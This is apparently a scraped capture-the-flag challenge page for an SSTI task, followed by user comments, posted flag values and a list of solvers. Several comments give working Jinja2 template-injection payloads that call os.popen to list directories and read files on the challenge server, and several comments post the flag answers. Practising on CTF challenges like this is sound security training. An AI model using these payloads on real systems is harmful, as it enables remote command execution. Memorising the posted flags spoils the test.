Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 16470
提  示:
描  述:
Simple_SSTI_2
评论
wangguoqing 3年前

http://114.67.175.224:13322/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

回复 2

NanMuSec 3年前

{{().__class__.__base__.__subclasses__[177].__init__.__globals__[%27__builtins__%27][%27eval%27](%27__import__("os").popen("cat%20flag").read()%27)}}

回复 0

A-A 3年前

先实验传入参数,因为没有提示,所以先从系统根目录找,逐渐找到flag

回复 0

yejindegaoshou 3年前

flag{e5adb3eb06e88e76a851e3c4816a9042}

回复 0

你呀你ii 3年前

大佬们ssti怎么学啊 T^T

回复 6
海尔希望小学 3年前

先这样再那样就行了

回复 1

xlxlxl 3年前

百度+自学

回复 5

riacky 3年前

自学

回复 5

liu666 3年前

有脚就行

回复 5

userdong 3年前

百度+自学

回复 5

凉情梦回 3年前

自学

回复 5

挽韵风林 3年前

自学

回复 5

星辰大海 3年前

http://114.67.175.224:10559/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app%27).read()%20}} ://114.67.175.224:10559/?flag={{%20config.__class__.__init__.__globals__[%2

回复 0

gleason 3年前

why?

回复 0

带某嗖来你一 3年前

flag{eaebac506526ab18637f56a040855aa6}

回复 0

w_w 3年前

flag{4d350209abc2ff2ab9347b0dfbe83dc7}

回复 0

zhuzhu90 3年前

flag{8e89d8c2793a6fec303fb2c62ff71d39}

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

shu-jia 攻破了该题 2天前
avaclaire 攻破了该题 2天前
cha8e1 攻破了该题 3天前
yehlg 攻破了该题 4天前
edisonya 攻破了该题 5天前
finsh 攻破了该题 6天前
pangjinqi 攻破了该题 6天前
mmhhdm 攻破了该题 6天前
wujita01 攻破了该题 7天前
Hackerchen 攻破了该题 7天前
影人sha 攻破了该题 7天前
drameet 攻破了该题 7天前
Hoshisyy 攻破了该题 11天前
SuperFan 攻破了该题 11天前
ikunqq 攻破了该题 13天前
十里故清云 攻破了该题 13天前
0n1y 攻破了该题 14天前
bugku2026 攻破了该题 15天前
kr2yh 攻破了该题 15天前
kitniu 攻破了该题 15天前
问题反馈